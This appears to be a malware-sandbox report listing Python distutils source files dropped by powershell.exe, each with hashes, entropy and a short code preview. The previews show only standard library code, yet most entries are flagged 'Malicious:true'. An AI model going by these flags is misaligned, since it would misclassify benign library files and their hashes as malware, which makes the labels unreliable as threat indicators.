                                                                                                                                                                                                                              SHA-512:1D8FE9B763C5D1B0254B2B5F454E06CE6F3AA9A3A2BBA3D533562C2BF62C2735F24D1EE402DC90C21CE7A479E12FE8D26C80F921DE981D847359AFACC41BACE0
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""distutils.dir_util..Utility functions for manipulating directories and directory trees."""..import errno.import os..from ._log import log.from .errors import DistutilsFileError, DistutilsInternalError..# cache for by mkpath() -- in addition to cheapening redundant calls,.# eliminates redundant "creating /foo/bar/baz" messages in dry-run mode._path_created = {}...def mkpath(name, mode=0o777, verbose=1, dry_run=0): # noqa: C901. """Create a directory and any missing ancestor directories... If the directory already exists (or if 'name' is the empty string, which. means the current directory, which of course exists), then do nothing.. Raise DistutilsFileError if unable to create some directory along the way. (eg. some sub-path exists, but is a file rather than a directory).. If 'verbose' is true, print a one-line summary of each mkdir to stdout.. Return the list of directories actually created... os.makedirs is not used because:.. a) It's new to Python 1.5.2,
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):50116
                                                                                                                                                                                                                              Entropy (8bit):4.356278628350896
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:Y6vl0ZtPjZKphkRcfrQqqiAsMel4jMR8lC2wVtWHARBOTjSHpx0OT5p2nDueGauW:Y6d0ZRjZKfpfrQqaXVyuH
                                                                                                                                                                                                                              MD5:C5661CB38A178A515D56C96CFAD22D90
                                                                                                                                                                                                                              SHA1:0FD4F527B35FA3BB0C9E157939E061FD0A3F5A17
                                                                                                                                                                                                                              SHA-256:44649F18C283AC82C6C2ECA50DBC7B30BAFE736F7C233C8224ACF03B6CB5B4F6
                                                                                                                                                                                                                              SHA-512:DE6CEEB7F53898FB71193167CF3F8FCA5E9167404351437B399E10BC4BAF01A49A4811CED756BF40F0614371AA091F38B0515784F4FB31C8DD6CE23B04608C25
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""distutils.dist..Provides the Distribution class, which represents the module distribution.being built/installed/distributed.."""..import contextlib.import logging.import os.import pathlib.import re.import sys.from collections.abc import Iterable.from email import message_from_file..try:. import warnings.except ImportError:. warnings = None..from ._log import log.from .debug import DEBUG.from .errors import (. DistutilsArgError,. DistutilsClassError,. DistutilsModuleError,. DistutilsOptionError,.).from .fancy_getopt import FancyGetopt, translate_longopt.from .util import check_environ, rfc822_escape, strtobool..# Regex to define acceptable Distutils command names. This is not *quite*.# the same as a Python NAME -- I don't allow leading underscores. The fact.# that they're very similar is no coincidence; the default naming scheme is.# to look for a Python module named after the command..command_re = re.compile(r'^[a-zA-Z]([a-zA-Z0-9_]*)$')...def _ensure_list(value,
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3589
                                                                                                                                                                                                                              Entropy (8bit):4.58710884435933
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:s1/iD24ov+FSbKRzUVlDFmSJS32o4qCFrKrm7O+NnTH0zcaCyb8+T9:cO24I+FNJU5hI32obarKrex7k9
                                                                                                                                                                                                                              MD5:111C454A0DBED93E4A505CA0ABD492F5
                                                                                                                                                                                                                              SHA1:2F24F9DA96A6D9E65B838F3F76D74F69CE41194B
                                                                                                                                                                                                                              SHA-256:66D0709E10E9400D9BC486B33D7343436E6E371338A76A26B1A491369577AE91
                                                                                                                                                                                                                              SHA-512:9AE9CA9DF08CBE34748EA61C77485DEA2A60C40A1D8F85C598FE29E1E151DACDA9537E3651ABA4F350D167A37E9C8D55F8C181EEA41EB5EBE6594028E0E50F2C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""distutils.errors..Provides exceptions used by the Distutils modules. Note that Distutils.modules may raise standard exceptions; in particular, SystemExit is.usually raised for errors that are obviously the end-user's fault.(eg. bad command-line arguments)...This module is safe to use in "from ... import *" mode; it only exports.symbols whose names start with "Distutils" and end with "Error"."""...class DistutilsError(Exception):. """The root of all Distutils evil.""".. pass...class DistutilsModuleError(DistutilsError):. """Unable to load an expected module, or to find an expected class. within some module (in particular, command modules and classes).""".. pass...class DistutilsClassError(DistutilsError):. """Some command class (or possibly distribution class, if anyone. feels a need to subclass Distribution) is found not to be holding. up its end of the bargain, ie. implementing some part of the. "command "interface.""".. pass...class DistutilsGetoptEr
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10197
                                                                                                                                                                                                                              Entropy (8bit):4.323944916861652
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:WyG2P2nXyqbUdJet90FM7RAxV999LK/O5rueB18sqFDzn2sPVpiWA8cK3xLonzgU:W6Pa30Js91E/LFNqPmnKBkowa2biG
                                                                                                                                                                                                                              MD5:BB4541D323D65812E8C473500C19FE27
                                                                                                                                                                                                                              SHA1:AEC972AF09C2B2CF8054D2A32D4D24F7371AE66D
                                                                                                                                                                                                                              SHA-256:AB083508D2603761AAEDB1457D0CF62696FC2DF2FE11CD854E58BC439AA1683E
                                                                                                                                                                                                                              SHA-512:1305C1BC4D5A9AEAB894D25BCCE3E0F2399A83DE0FEBE3B4FE673FDD0AC4D077F122A5DF3B7E4B05C788A89D44C51B63D9D81E25CDBA3BFAAB1C56EF60A34F85
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""distutils.extension..Provides the Extension class, used to describe C/C++ extension.modules in setup scripts."""..import os.import warnings..# This class is really only used by the "build_ext" command, so it might.# make sense to put it in distutils.command.build_ext. However, that.# module is already big enough, and I want to make this class a bit more.# complex to simplify some common cases ("foo" module in "foo.c") and do.# better error-checking ("foo.c" actually exists)..#.# Also, putting this in build_ext.py means every setup script would have to.# import that large-ish module (indirectly, through distutils.core) in.# order to do anything....class Extension:. """Just a collection of attributes that describes an extension. module and everything needed to build it (hopefully in a portable. way, but there are hooks that let you be as unportable as you need)... Instance attributes:. name : string. the full name of the extension, including any packages -- ie
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):17831
                                                                                                                                                                                                                              Entropy (8bit):4.265915739297825
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:AFGg76C2Ze607HzPN6bMxOdvQ49uMNe1l5buoRhVy8bPnFSbtX0wOVZxwZzpC:ApeXIrbNwMGKJbTRhVJbfstkw6q+
                                                                                                                                                                                                                              MD5:E9C237C977B5E858C086553CDA501BE6
                                                                                                                                                                                                                              SHA1:F95D395EDE4D369C9E40B7DC13120D783A69740E
                                                                                                                                                                                                                              SHA-256:571C071EDC898BC429F19C0AB89873C52917F71C2A0AAA80C6AE1DF156E40166
                                                                                                                                                                                                                              SHA-512:8F8ABA2671AF668AD2E9A352B5E3F8E119C8489F6BE5A91A12B077F0A4E76827A054C80DD4392A2ADFB83E6A0AE2120C575D545FC48C0B56496E0E506008C6A0
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""distutils.fancy_getopt..Wrapper around the standard getopt module that provides the following.additional features:. * short and long options are tied together. * options have help strings, so fancy_getopt could potentially. create a complete usage summary. * options set attributes of a passed-in object."""..import getopt.import re.import string.import sys.from typing import Any, Sequence..from .errors import DistutilsArgError, DistutilsGetoptError..# Much like command_re in distutils.core, this is close to but not quite.# the same as a Python NAME -- except, in the spirit of most GNU.# utilities, we use '-' in place of '_'. (The spirit of LISP lives on!).# The similarities to NAME are again not a coincidence....longopt_pat = r'[a-zA-Z](?:[a-zA-Z0-9-]*)'.longopt_re = re.compile(r'^%s$' % longopt_pat)..# For recognizing "negative alias" options, eg. "quiet=!verbose".neg_alias_re = re.compile(f"^({longopt_pat})=!({longopt_pat})$")..# This is used to translate long options to leg
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7926
                                                                                                                                                                                                                              Entropy (8bit):4.473823209545954
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Iwqpf/zJLH03i5JxW3K20Lz8iZFAVyDU5HyFzkRtjslPgClpoLLg:IPf7tH0S5Jxb7zL8V5MFzKslPgioLLg
                                                                                                                                                                                                                              MD5:B5CF3A6C6CA2B66A3287E1795486A2F4
                                                                                                                                                                                                                              SHA1:96BB543D4E887EF7803902359A0241121754C5C6
                                                                                                                                                                                                                              SHA-256:DC0FFD832901047167D107FC13390961AA98CE641BF3E92A947421B1A9000AF9
                                                                                                                                                                                                                              SHA-512:292C9E980FACB389403173095C851AC2185D217668E446CC00D6384B32106D290A514E75AB8819D5869EA488A55CE7077C850B9BC3076CAD46E804D81CAD963D
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""distutils.file_util..Utility functions for operating on single files.."""..import os..from ._log import log.from .errors import DistutilsFileError..# for generating verbose output in 'copy_file()'._copy_action = {None: 'copying', 'hard': 'hard linking', 'sym': 'symbolically linking'}...def _copy_file_contents(src, dst, buffer_size=16 * 1024): # noqa: C901. """Copy the file 'src' to 'dst'; both must be filenames. Any error. opening either file, reading from 'src', or writing to 'dst', raises. DistutilsFileError. Data is read/written in chunks of 'buffer_size'. bytes (default 16k). No attempt is made to handle anything apart from. regular files.. """. # Stolen from shutil module in the standard library, but with. # custom error-handling added.. fsrc = None. fdst = None. try:. try:. fsrc = open(src, 'rb'). except OSError as e:. raise DistutilsFileError(f"could not open '{src}': {e.strerror}").. if os.path.e
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13635
                                                                                                                                                                                                                              Entropy (8bit):4.306932160733513
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:de4ckzpFFrgLNEwFpKX1aGLqq/TBJIXYDyUL2l5rPjh7i9Kgm+r:xFzrFrgLNEou1VLqq9JpWL5Djd0
                                                                                                                                                                                                                              MD5:89641FFBD1DA0DF04456380527CB9A68
                                                                                                                                                                                                                              SHA1:72F1888141B84326E598C938E9D01D7DD578FF53
                                                                                                                                                                                                                              SHA-256:F0443C6D5F71DD7016F1D6BA088C8C1F9FEAA3615FD052451F256988F60558C3
                                                                                                                                                                                                                              SHA-512:98749BCA8DFBD5D6F34721CC6854AC7051A93B1C80F14465AE9788B36A3EF7963485FE9ADC50F8FF3A5BC725928D9C4B2DEF03CE91C13A0B397676800A374E24
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""distutils.filelist..Provides the FileList class, used for poking about the filesystem.and building lists of files.."""..import fnmatch.import functools.import os.import re..from ._log import log.from .errors import DistutilsInternalError, DistutilsTemplateError.from .util import convert_path...class FileList:. """A list of files built by on exploring the filesystem and filtered by. applying various patterns to what we find there... Instance attributes:. dir. directory from which files will be taken -- only used if. 'allfiles' not supplied to constructor. files. list of filenames currently being built/filtered/manipulated. allfiles. complete list of files under consideration (ie. without any. filtering applied). """.. def __init__(self, warn=None, debug_print=None):. # ignore argument to FileList, but keep them for backwards. # compatibility. self.allfiles = None. self.files = [].. def set
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1200
                                                                                                                                                                                                                              Entropy (8bit):4.751311805420747
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:zOz4i3rM18RQthA/jZlNeJIhAMU2SjWdiTPMscVB4Ac4qcPMiw++:az4iomUA/7N9hmWQTEscsdpr9++
                                                                                                                                                                                                                              MD5:0B8347BB1156DD92E2761EF480EE9618
                                                                                                                                                                                                                              SHA1:E953EC66C246B8691C497B9CC8F419032315B9F8
                                                                                                                                                                                                                              SHA-256:57206CE63EF3E3E2BA5D310405385473D1F2329A0F2C6B50A4446A6F3E72970C
                                                                                                                                                                                                                              SHA-512:28868D4A3C0C69A4586F83DDD45C421F7E9D2CA4EB5F4B88C4B9AF3D342268A2F379A46D727CB9F5F4591B8E2100F83CE0996CAD26C6588C5A4F3F0FB3943EEC
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:""".A simple log mechanism styled after PEP 282...Retained for compatibility and should not be used.."""..import logging.import warnings..from ._log import log as _global_log..DEBUG = logging.DEBUG.INFO = logging.INFO.WARN = logging.WARN.ERROR = logging.ERROR.FATAL = logging.FATAL..log = _global_log.log.debug = _global_log.debug.info = _global_log.info.warn = _global_log.warning.error = _global_log.error.fatal = _global_log.fatal...def set_threshold(level):. orig = _global_log.level. _global_log.setLevel(level). return orig...def set_verbosity(v):. if v <= 0:. set_threshold(logging.WARN). elif v == 1:. set_threshold(logging.INFO). elif v >= 2:. set_threshold(logging.DEBUG)...class Log(logging.Logger):. """distutils.log.Log is deprecated, please use an alternative from `logging`.""".. def __init__(self, threshold=WARN):. warnings.warn(Log.__doc__) # avoid DeprecationWarning to ensure warn is shown. super().__init__(__name__, le
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):30108
                                                                                                                                                                                                                              Entropy (8bit):4.496980223006664
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:1nQQ4ZLH9tQeEsqGAwN12lSYs6fyaqJA9gAfJUpo0V/vNcWOI7DXIvSbKjwPihW:1d4ZLH9aeEtFXSYJ4dqcV9b
                                                                                                                                                                                                                              MD5:6F265527CE3C0626859F38F97F34A133
                                                                                                                                                                                                                              SHA1:004728516462D89A84F9C26C9ED3C0CC7AA6A6FF
                                                                                                                                                                                                                              SHA-256:F985EA4ABDBE393CA09BA49C1E6291AC8FE02D995464A128587B2E70D06D78BD
                                                                                                                                                                                                                              SHA-512:D50C071DE1E1767BB3CB7C863A0FB1D453AD83DF0A38097FC977D54D322D70BB3F07336050CE25F78D512B48C48406CBF8E2BA0783B2B715129615BA81CD3947
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""distutils.msvc9compiler..Contains MSVCCompiler, an implementation of the abstract CCompiler class.for the Microsoft Visual Studio 2008...The module is compatible with VS 2005 and VS 2008. You can find legacy support.for older versions of VS in distutils.msvccompiler.."""..# Written by Perry Stoll.# hacked by Robin Becker and Thomas Heller to do a better job of.# finding DevStudio (through the registry).# ported to VS2005 and VS 2008 by Christian Heimes..import os.import re.import subprocess.import sys.import warnings.import winreg..from ._log import log.from .ccompiler import CCompiler, gen_lib_options.from .errors import (. CompileError,. DistutilsExecError,. DistutilsPlatformError,. LibError,. LinkError,.).from .util import get_platform..warnings.warn(. "msvc9compiler is deprecated and slated to be removed ". "in the future. Please discontinue use or file an issue ". "with pypa/distutils describing your use case.",. DeprecationWarning,.)..RegOpenKeyEx
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):23443
                                                                                                                                                                                                                              Entropy (8bit):4.419109846302895
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:8ciz1Q8TuHX0zqGAPBNgyo4JpQ9gAfJUpo0V/3kjwPihSPHVByeQ:8cOnTuHX0+FPci/vqcVVHVByeQ
                                                                                                                                                                                                                              MD5:884731486852E31873E9332A5F5E0DD6
                                                                                                                                                                                                                              SHA1:1C674600F6906C9EF68876F18DF107A4D0D675A6
                                                                                                                                                                                                                              SHA-256:2B84A7236E3C86FDFB970F10BA3B472AD1176D3756749C10E48CDAAC2416F179
                                                                                                                                                                                                                              SHA-512:408FC9FFA01389D6D33EF21CD8F06395F38FFE0849ED6559E4EFAF132C89EFE34852D3F1EB8E11D278609B4A0E4D765DB62C90198CDF6C604ED23DAA217F4BA0
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""distutils.msvccompiler..Contains MSVCCompiler, an implementation of the abstract CCompiler class.for the Microsoft Visual Studio.."""..# Written by Perry Stoll.# hacked by Robin Becker and Thomas Heller to do a better job of.# finding DevStudio (through the registry)..import os.import sys.import warnings..from ._log import log.from .ccompiler import CCompiler, gen_lib_options.from .errors import (. CompileError,. DistutilsExecError,. DistutilsPlatformError,. LibError,. LinkError,.).._can_read_reg = False.try:. import winreg.. _can_read_reg = True. hkey_mod = winreg.. RegOpenKeyEx = winreg.OpenKeyEx. RegEnumKey = winreg.EnumKey. RegEnumValue = winreg.EnumValue. RegError = winreg.error..except ImportError:. try:. import win32api. import win32con.. _can_read_reg = True. hkey_mod = win32con.. RegOpenKeyEx = win32api.RegOpenKeyEx. RegEnumKey = win32api.RegEnumKey. RegEnumValue = win32api.RegEnumValu
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):205
                                                                                                                                                                                                                              Entropy (8bit):4.290154029665289
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:lOWMWFBtsWtAlVQhzVVQvYRSVVQLEMdxQjMpLXw2/y7P:Ng2AlihL6YRieHGIRw26z
                                                                                                                                                                                                                              MD5:CCEE9376E343E53B56E5BB21277D71E0
                                                                                                                                                                                                                              SHA1:3C685FDB083A8C6584E7E600998BEF1C3B6D8BF0
                                                                                                                                                                                                                              SHA-256:8A9D2A768146DFED5D2794AC2E049A669C9C3A3A60E58FE89FB6EDB0F0D2F24C
                                                                                                                                                                                                                              SHA-512:D43E07B87ECD972AC35E1C55FB2DC2974EAF243CE45A555DDF32879CF1D7348818B8042AF1B01FDD31D31A3DA6714821EE1AB60A79333216EBB30139890D9104
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:def aix_platform(osname, version, release):. try:. import _aix_support.. return _aix_support.aix_platform(). except ImportError:. pass. return f"{osname}-{version}.{release}".
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1964
                                                                                                                                                                                                                              Entropy (8bit):4.794812042870537
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:ypbXSWGkxZWMHZO07NLCabNbFFuSynMxE:y5SB07NLCAbF1yR
                                                                                                                                                                                                                              MD5:6290BA0B684A3CFA453EA93438315381
                                                                                                                                                                                                                              SHA1:A1B47772916E2C7F25F2D8E6C8C26B5C81716B67
                                                                                                                                                                                                                              SHA-256:84EB03EA5C192EA66832769C349DCFEA7500F8B250844A55B584F3547D28F7A3
                                                                                                                                                                                                                              SHA-512:F434502EA1081AE1E8B26C425389DEDE5F2A830D57A1ACC4B41443F64D2D9FB3BE768F176A4630D46EED04CD2D70C5BAE80BFD4BBBD851D36E5F6C90E7CCEC06
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import functools.import itertools.import platform.import sys...def add_ext_suffix_39(vars):. """. Ensure vars contains 'EXT_SUFFIX'. pypa/distutils#130. """. import _imp.. ext_suffix = _imp.extension_suffixes()[0]. vars.update(. EXT_SUFFIX=ext_suffix,. # sysconfig sets SO to match EXT_SUFFIX, so maintain. # that expectation.. # https://github.com/python/cpython/blob/785cc6770588de087d09e89a69110af2542be208/Lib/sysconfig.py#L671-L673. SO=ext_suffix,. )...needs_ext_suffix = sys.version_info < (3, 10) and platform.system() == 'Windows'.add_ext_suffix = add_ext_suffix_39 if needs_ext_suffix else lambda vars: None...# from more_itertools.class UnequalIterablesError(ValueError):. def __init__(self, details=None):. msg = 'Iterables have different lengths'. if details is not None:. msg += (': index 0 has length {}; index {} has length {}').format(*details).. super().__init__(msg)...# from more_itertools.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3431
                                                                                                                                                                                                                              Entropy (8bit):4.626038089828975
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:kuIwY8Qty12p5lH9oiAlFOVzuIWRvQZvu:kBwmY1iDH9oiAyhSRvQZu
                                                                                                                                                                                                                              MD5:9BBF4ED21A97D41AFDA094F5B9792917
                                                                                                                                                                                                                              SHA1:6E7D96DF128936BD5C19698A4AEBDBAB456D47AE
                                                                                                                                                                                                                              SHA-256:F4B5306C9B1973056B331EFCCA764878E15F7864D5E35F9B7FD1A0B0482E474E
                                                                                                                                                                                                                              SHA-512:EA0A2F7E6B34FF116B8B0E284F1DCF702081B43CD1706D2077ECAC09356FCFDA942E50FF3CB5C62B6FFE890EDDF69575D3161BEDAFBF7027129A5F72DA07914D
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""distutils.spawn..Provides the 'spawn()' function, a front-end to various platform-.specific functions for launching another program in a sub-process..Also provides the 'find_executable()' to search the path for a given.executable name.."""..import os.import subprocess.import sys..from ._log import log.from .debug import DEBUG.from .errors import DistutilsExecError...def spawn(cmd, search_path=1, verbose=0, dry_run=0, env=None): # noqa: C901. """Run another program, specified as a command list 'cmd', in a new process... 'cmd' is just the argument list for the new process, ie.. cmd[0] is the program to run and cmd[1:] are the rest of its arguments.. There is no way to run a program with a name different from that of its. executable... If 'search_path' is true (the default), the system's executable. search path will be used to find the program; otherwise, cmd[0]. must be the exact path to the executable. If 'dry_run' is true,. the command will not actually
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18485
                                                                                                                                                                                                                              Entropy (8bit):4.612778122360704
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:zMfedhp6glANZR3onvI96DOcCTNoMl2fscS9i:jdhQg8zeDDOvRPoscSU
                                                                                                                                                                                                                              MD5:4BBF0400E8E3B81C5762C6D11D576400
                                                                                                                                                                                                                              SHA1:B416A8703FF17AE09692653FDC84955B7C0D956F
                                                                                                                                                                                                                              SHA-256:B03ACF4C597E4335659DE580E126807FF01E4C8644FA9CAD5A7C467D11EA0483
                                                                                                                                                                                                                              SHA-512:C765FC4615CAD7146F1FF383D8BFCF9220382248EB838A7F04040E002313A442353076A692AC317BC1F5731ACD1E31AABD1ECCCAD82248FD54631C17CC1C27DD
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""Provide access to Python's configuration information. The specific.configuration variables available depend heavily on the platform and.configuration. The values may be retrieved using.get_config_var(name), and the list of variables is available via.get_config_vars().keys(). Additional convenience functions are also.available...Written by: Fred L. Drake, Jr..Email: <fdrake@acm.org>."""..import functools.import os.import pathlib.import re.import sys.import sysconfig..from . import py39compat.from ._functools import pass_none.from .errors import DistutilsPlatformError..IS_PYPY = '__pypy__' in sys.builtin_module_names..# These are needed in a couple of spots, so just compute them once..PREFIX = os.path.normpath(sys.prefix).EXEC_PREFIX = os.path.normpath(sys.exec_prefix).BASE_PREFIX = os.path.normpath(sys.base_prefix).BASE_EXEC_PREFIX = os.path.normpath(sys.base_exec_prefix)..# Path to the base directory of the project. On Windows the binary may.# live in project/PCbuild/win
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12100
                                                                                                                                                                                                                              Entropy (8bit):4.160299848606925
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:zaj6s6sONCFFaDiqWg3jLek1LM21kw7WAXrUn2cyiif0fKjr5D:z6P6CfInWgfek1L/yRAg2F90yjr5D
                                                                                                                                                                                                                              MD5:26004D598CB3E9E62B30D722AD0B1FB2
                                                                                                                                                                                                                              SHA1:F729D42F2581CB35B3E81DDECD93CBC5BCF102B9
                                                                                                                                                                                                                              SHA-256:312CCFD649A31593B09EB750B2AC06DD958D6B6C10E0E5CAEF9277496397D398
                                                                                                                                                                                                                              SHA-512:335DE84538A75601CBAD4890EDE4DBC0E4B46D7238A75F06D3B976FD8FA4000D5A2C3C86398D2FC7527BCF8BD9D2AB023C2317B2D07ACF755F0C8C7ABB4698D7
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""text_file..provides the TextFile class, which gives an interface to text files.that (optionally) takes care of stripping comments, ignoring blank.lines, and joining lines with backslashes."""..import sys...class TextFile:. """Provides a file-like object that takes care of all the things you. commonly want to do when processing a text file that has some. line-by-line syntax: strip comments (as long as "#" is your. comment character), skip blank lines, join adjacent lines by. escaping the newline (ie. backslash at end of line), strip. leading and/or trailing whitespace. All of these are optional. and independently controllable... Provides a 'warn()' method so you can generate warning messages that. report physical line number, even if the logical line in question. spans multiple physical lines. Also provides 'unreadline()' for. implementing line-at-a-time lookahead... Constructor is called as:.. TextFile (filename=None, file=None, **options
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15572
                                                                                                                                                                                                                              Entropy (8bit):4.596986914391114
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:z4c9Ymu7rzdMsvH2HqDZJU0BHoKeZpNxe+HCTT+/g7i7:Mc9BU7v8qPTeT7h/g7i7
                                                                                                                                                                                                                              MD5:55B9187C01CDB41B84105239671E4889
                                                                                                                                                                                                                              SHA1:E3425E687C577EACE2820D5A259491CDE9AAF0BB
                                                                                                                                                                                                                              SHA-256:A60996779D229957C4B2126ECBE7CD5AA7115C37EDFC2F3F504AD6EBC73F9F62
                                                                                                                                                                                                                              SHA-512:795EE8AEC68FE5C129A441018264ABE0D2D7BA92FF9FB789864F77FAA3D3CA2CCD8CA6976D838A4C2D134B62BE96990DF5CB33E96E064AB9B9BC804D8F89399F
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""distutils.unixccompiler..Contains the UnixCCompiler class, a subclass of CCompiler that handles.the "typical" Unix-style command-line C compiler:. * macros defined with -Dname[=value]. * macros undefined with -Uname. * include search directories specified with -Idir. * libraries specified with -lllib. * library search directories specified with -Ldir. * compile handled by 'cc' (or similar) executable with -c option:. compiles .c to .o. * link static library handled by 'ar' command (possibly with 'ranlib'). * link shared library handled by 'cc -shared'."""..from __future__ import annotations..import itertools.import os.import re.import shlex.import sys..from . import sysconfig.from .compat import consolidate_linker_args.from ._log import log.from ._macos_compat import compiler_fixup.from ._modified import newer.from .ccompiler import CCompiler, gen_lib_options, gen_preprocess_options.from .errors import CompileError, DistutilsExecError, LibError, LinkError..# XXX Things no
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18120
                                                                                                                                                                                                                              Entropy (8bit):4.568391507378787
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:kdyNIGA59krIIZsSczLs0uMrZL0lF81Ol1PGRsqSl3TPkuJ4oYTF:kdyNqkrIIZsScnPIF8qPGa33TPknF
                                                                                                                                                                                                                              MD5:3D629B51387A49E6408CCFE72B412600
                                                                                                                                                                                                                              SHA1:78A528EE96DF23BFA6B81D13B40B2109A5C32C4C
                                                                                                                                                                                                                              SHA-256:1F0BEC94CDA212722F1136CF7FA344735442C6861F447F8F7EEE4A5F309FE481
                                                                                                                                                                                                                              SHA-512:1E7B73C7EEE3D16E71FAB2A41FBFECCE5D5DCDCE02DDE97C43BC0C8152603BC1207405632AA8BE0EEEF3FC3A052179395FF82B314489A1C744BBFCEFD9AC8B6B
                                                                                                                                                                                                                              Malicious:true
